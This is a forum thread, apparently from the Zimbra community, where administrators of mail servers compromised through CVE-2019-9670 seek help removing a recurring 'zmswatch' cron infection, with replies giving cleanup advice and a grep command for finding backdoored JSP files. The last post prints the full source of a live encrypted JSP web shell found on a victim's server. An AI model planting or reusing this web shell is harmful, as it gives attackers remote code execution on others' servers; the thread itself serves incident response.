CVE-2019-9670 being actively exploited (Hacked Server)
Re: CVE-2019-9670 being actively exploited
Hi ng
My zimbra machine is compromised.
If i delete zmswatch script and zmswatch crontab after few hours the script returns .
How can i find the source malaware ?
How can i delete definitly the script?
Please help me. !!
Thanks Stefano
My zimbra machine is compromised.
If i delete zmswatch script and zmswatch crontab after few hours the script returns .
How can i find the source malaware ?
How can i delete definitly the script?
Please help me. !!
Thanks Stefano
Re: CVE-2019-9670 being actively exploited
Have a read over the whole thread.... I'll give a few thoughts here, but this is not everything...
You've most likely got a cron job re-downloading the malicious script. There may also be malicious js files scattered through the jetty/webapps folders.
I found uninstalling wget and curl stopped the scripts working to reinfect. This may give you a better chance to clean things up, but they may also use other tricks.
Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.
Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimvra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.
You've most likely got a cron job re-downloading the malicious script. There may also be malicious js files scattered through the jetty/webapps folders.
I found uninstalling wget and curl stopped the scripts working to reinfect. This may give you a better chance to clean things up, but they may also use other tricks.
Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.
Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimvra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.
Re: CVE-2019-9670 being actively exploited
read the whole thread and/or the blogpost linked here, you will find guidelines on how to cleanup your systemStemond11 wrote:Hi ng
How can i find the source malaware ?
How can i delete definitly the script?
Re: CVE-2019-9670 being actively exploited
in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!
In /tmp all request JSP like this every 30 seconds are in read-only:
WHY ??
<Configure class="org.eclipse.jetty.webapp.WebAppContext">
<Get name="securityHandler">
<Set name="loginService">
<New class="com.zimbra.cs.servlet.ZimbraLoginService">
<Set name="name">Zimbra</Set>
</New>
</Set>
<Set name="authenticatorFactory">
<New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
<Set name="urlPattern">//downloads/*</Set>
</New>
</Set>
</Get>
</Configure>
I have zmswatch on crontab and after i delete/kill it , it's come back!
In /tmp all request JSP like this every 30 seconds are in read-only:
WHY ??
<Configure class="org.eclipse.jetty.webapp.WebAppContext">
<Get name="securityHandler">
<Set name="loginService">
<New class="com.zimbra.cs.servlet.ZimbraLoginService">
<Set name="name">Zimbra</Set>
</New>
</Set>
<Set name="authenticatorFactory">
<New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
<Set name="urlPattern">//downloads/*</Set>
</New>
</Set>
</Get>
</Configure>
Re: CVE-2019-9670 being actively exploited
it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so onStemond11 wrote:in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!
Re: CVE-2019-9670 being actively exploited
i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp
thank you
Stefano
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp
thank you
Stefano
Re: CVE-2019-9670 being actively exploited
After:maxxer wrote:it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so onStemond11 wrote:in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!
===
What should I clean up?
how to figure out what are the unwanted jsp files?
Thanks,
Re: CVE-2019-9670 being actively exploited
The infection creates new jsp's and edits existing ones with "control code". This way the attacker can remotely execute commands on your comprimised system. Patching after infection is not enough, you need to find all those "backdoors" and remove them or replace them with the ones from the source (install packages).Stemond11 wrote:i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp
thank you
Stefano
Please read the blog on maxxer it's site, as he linked to at the start of this topic.
This might be hard if you're not an experienced sysadmin. Maybe this will help you to find those files:
Code: Select all
grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
Re: CVE-2019-9670 being actively exploited
Hello all!
I have the same issue on a 8.6 Ubuntu.
- added patch
- clean /var/spool/cron/crontabs/zimbra (line at the end)
- clean /opt/zimbra/log/zmswatch and zmswatch.sh
- removed added email-accounts (only one)
- changed the admin-pass for zimbra-user
- cant find any strange .jsp-files.
- clean /opt/zimbra/data/tmp/.zmswatch.xxx files
zmswatch still popping up...
after cleaning like above zmswatch started without zimbra-server running.
Any ideas or thoughts about this?
I have the same issue on a 8.6 Ubuntu.
- added patch
- clean /var/spool/cron/crontabs/zimbra (line at the end)
- clean /opt/zimbra/log/zmswatch and zmswatch.sh
- removed added email-accounts (only one)
- changed the admin-pass for zimbra-user
- cant find any strange .jsp-files.
- clean /opt/zimbra/data/tmp/.zmswatch.xxx files
zmswatch still popping up...
after cleaning like above zmswatch started without zimbra-server running.
Any ideas or thoughts about this?
Re: CVE-2019-9670 being actively exploited
[root@xxxx ]# grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));
What this mean???
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));
What this mean???